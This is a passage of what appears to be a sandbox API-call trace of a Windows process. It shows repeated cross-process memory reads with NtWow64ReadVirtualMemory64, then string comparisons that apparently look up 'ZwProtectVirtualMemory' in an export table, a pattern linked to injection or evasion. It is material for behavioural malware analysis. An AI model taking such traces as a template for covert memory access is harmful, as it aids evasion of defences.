Buffer=0x7ff9, BufferSize=0x27a9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.837] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fba000, Buffer=0x7ff9, BufferSize=0x27aa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.837] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fbb000, Buffer=0x7ff9, BufferSize=0x27ab000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.837] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fbc000, Buffer=0x7ff9, BufferSize=0x27ac000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.837] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fbd000, Buffer=0x7ff9, BufferSize=0x27ad000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.837] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fbe000, Buffer=0x7ff9, BufferSize=0x27ae000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.837] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fbf000, Buffer=0x7ff9, BufferSize=0x27af000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.838] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fc0000, Buffer=0x7ff9, BufferSize=0x27b0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.838] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fc1000, Buffer=0x7ff9, BufferSize=0x27b1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.838] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fc2000, Buffer=0x7ff9, BufferSize=0x27b2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.838] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fc3000, Buffer=0x7ff9, BufferSize=0x27b3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.838] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fc4000, Buffer=0x7ff9, BufferSize=0x27b4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.838] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fc5000, Buffer=0x7ff9, BufferSize=0x27b5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.838] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fc6000, Buffer=0x7ff9, BufferSize=0x27b6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.838] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fc7000, Buffer=0x7ff9, BufferSize=0x27b7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.838] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fc8000, Buffer=0x7ff9, BufferSize=0x27b8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.838] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fc9000, Buffer=0x7ff9, BufferSize=0x27b9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.838] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fca000, Buffer=0x7ff9, BufferSize=0x27ba000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.839] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fcb000, Buffer=0x7ff9, BufferSize=0x27bb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.839] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fcc000, Buffer=0x7ff9, BufferSize=0x27bc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.839] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fcd000, Buffer=0x7ff9, BufferSize=0x27bd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.839] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fce000, Buffer=0x7ff9, BufferSize=0x27be000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.839] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fcf000, Buffer=0x7ff9, BufferSize=0x27bf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.839] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fd0000, Buffer=0x7ff9, BufferSize=0x27c0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.839] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fd1000, Buffer=0x7ff9, BufferSize=0x27c1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.839] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fd2000, Buffer=0x7ff9, BufferSize=0x27c2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.839] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fd3000, Buffer=0x7ff9, BufferSize=0x27c3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.839] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fd4000, Buffer=0x7ff9, BufferSize=0x27c4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.839] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fd5000, Buffer=0x7ff9, BufferSize=0x27c5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.839] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fd6000, Buffer=0x7ff9, BufferSize=0x27c6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.840] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fd7000, Buffer=0x7ff9, BufferSize=0x27c7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.840] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fd8000, Buffer=0x7ff9, BufferSize=0x27c8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.840] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fd9000, Buffer=0x7ff9, BufferSize=0x27c9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.840] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fda000, Buffer=0x7ff9, BufferSize=0x27ca000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.840] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fdb000, Buffer=0x7ff9, BufferSize=0x27cb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.840] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fdc000, Buffer=0x7ff9, BufferSize=0x27cc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.840] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fdd000, Buffer=0x7ff9, BufferSize=0x27cd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.840] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fde000, Buffer=0x7ff9, BufferSize=0x27ce000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.840] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fdf000, Buffer=0x7ff9, BufferSize=0x27cf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.840] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fe0000, Buffer=0x7ff9, BufferSize=0x27d0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.840] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fe1000, Buffer=0x7ff9, BufferSize=0x27d1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.841] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fe2000, Buffer=0x7ff9, BufferSize=0x27d2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.841] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fe3000, Buffer=0x7ff9, BufferSize=0x27d3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.841] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fe4000, Buffer=0x7ff9, BufferSize=0x27d4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.841] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fe5000, Buffer=0x7ff9, BufferSize=0x27d5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.841] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fe6000, Buffer=0x7ff9, BufferSize=0x27d6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.841] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fe7000, Buffer=0x7ff9, BufferSize=0x27d7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.842] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fe8000, Buffer=0x7ff9, BufferSize=0x27d8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.842] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fe9000, Buffer=0x7ff9, BufferSize=0x27d9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.842] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fea000, Buffer=0x7ff9, BufferSize=0x27da000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.842] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77feb000, Buffer=0x7ff9, BufferSize=0x27db000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.842] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fec000, Buffer=0x7ff9, BufferSize=0x27dc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.842] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fed000, Buffer=0x7ff9, BufferSize=0x27dd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.842] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fee000, Buffer=0x7ff9, BufferSize=0x27de000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.842] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fef000, Buffer=0x7ff9, BufferSize=0x27df000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.842] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ff0000, Buffer=0x7ff9, BufferSize=0x27e0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.842] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ff1000, Buffer=0x7ff9, BufferSize=0x27e1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.842] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ff2000, Buffer=0x7ff9, BufferSize=0x27e2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.842] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ff3000, Buffer=0x7ff9, BufferSize=0x27e3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.843] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ff4000, Buffer=0x7ff9, BufferSize=0x27e4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.843] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ff5000, Buffer=0x7ff9, BufferSize=0x27e5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.843] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ff6000, Buffer=0x7ff9, BufferSize=0x27e6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.843] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ff7000, Buffer=0x7ff9, BufferSize=0x27e7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.843] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ff8000, Buffer=0x7ff9, BufferSize=0x27e8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.843] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ff9000, Buffer=0x7ff9, BufferSize=0x27e9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.843] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ffa000, Buffer=0x7ff9, BufferSize=0x27ea000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.843] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ffb000, Buffer=0x7ff9, BufferSize=0x27eb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.843] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ffc000, Buffer=0x7ff9, BufferSize=0x27ec000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.844] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ffd000, Buffer=0x7ff9, BufferSize=0x27ed000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.844] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77ffe000, Buffer=0x7ff9, BufferSize=0x27ee000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.844] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x77fff000, Buffer=0x7ff9, BufferSize=0x27ef000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.844] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78000000, Buffer=0x7ff9, BufferSize=0x27f0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.844] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78001000, Buffer=0x7ff9, BufferSize=0x27f1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.844] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78002000, Buffer=0x7ff9, BufferSize=0x27f2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.844] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78003000, Buffer=0x7ff9, BufferSize=0x27f3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.844] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78004000, Buffer=0x7ff9, BufferSize=0x27f4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.844] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78005000, Buffer=0x7ff9, BufferSize=0x27f5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.844] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78006000, Buffer=0x7ff9, BufferSize=0x27f6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.845] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78007000, Buffer=0x7ff9, BufferSize=0x27f7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.845] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78008000, Buffer=0x7ff9, BufferSize=0x27f8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.845] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78009000, Buffer=0x7ff9, BufferSize=0x27f9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.845] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7800a000, Buffer=0x7ff9, BufferSize=0x27fa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.845] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7800b000, Buffer=0x7ff9, BufferSize=0x27fb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.845] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7800c000, Buffer=0x7ff9, BufferSize=0x27fc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.845] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7800d000, Buffer=0x7ff9, BufferSize=0x27fd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.845] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7800e000, Buffer=0x7ff9, BufferSize=0x27fe000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.845] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7800f000, Buffer=0x7ff9, BufferSize=0x27ff000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.845] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78010000, Buffer=0x7ff9, BufferSize=0x2800000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.845] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78011000, Buffer=0x7ff9, BufferSize=0x2801000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.845] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78012000, Buffer=0x7ff9, BufferSize=0x2802000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.846] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78013000, Buffer=0x7ff9, BufferSize=0x2803000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.846] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78014000, Buffer=0x7ff9, BufferSize=0x2804000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.846] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78015000, Buffer=0x7ff9, BufferSize=0x2805000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.846] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78016000, Buffer=0x7ff9, BufferSize=0x2806000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.846] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78017000, Buffer=0x7ff9, BufferSize=0x2807000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.846] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78018000, Buffer=0x7ff9, BufferSize=0x2808000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.846] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78019000, Buffer=0x7ff9, BufferSize=0x2809000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.846] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7801a000, Buffer=0x7ff9, BufferSize=0x280a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.846] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7801b000, Buffer=0x7ff9, BufferSize=0x280b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.846] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7801c000, Buffer=0x7ff9, BufferSize=0x280c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.846] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7801d000, Buffer=0x7ff9, BufferSize=0x280d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.847] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7801e000, Buffer=0x7ff9, BufferSize=0x280e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.847] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x7801f000, Buffer=0x7ff9, BufferSize=0x280f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.847] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78020000, Buffer=0x7ff9, BufferSize=0x2810000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.847] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78021000, Buffer=0x7ff9, BufferSize=0x2811000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.847] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78022000, Buffer=0x7ff9, BufferSize=0x2812000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.847] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78023000, Buffer=0x7ff9, BufferSize=0x2813000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.847] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78024000, Buffer=0x7ff9, BufferSize=0x2814000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.847] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78025000, Buffer=0x7ff9, BufferSize=0x2815000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.847] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78026000, Buffer=0x7ff9, BufferSize=0x2816000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.847] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78027000, Buffer=0x7ff9, BufferSize=0x2817000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.848] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0x78028000, Buffer=0x7ff9, BufferSize=0x2818000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff9, NumberOfBytesRead=0x1000) returned 0x0 [0206.859] lstrcmpA (lpString1="A_SHAFinal", lpString2="ZwProtectVirtualMemory") returned -1 [0206.859] lstrcmpA (lpString1="A_SHAInit", lpString2="ZwProtectVirtualMemory") returned -1 [0206.859] lstrcmpA (lpString1="A_SHAUpdate", lpString2="ZwProtectVirtualMemory") returned -1 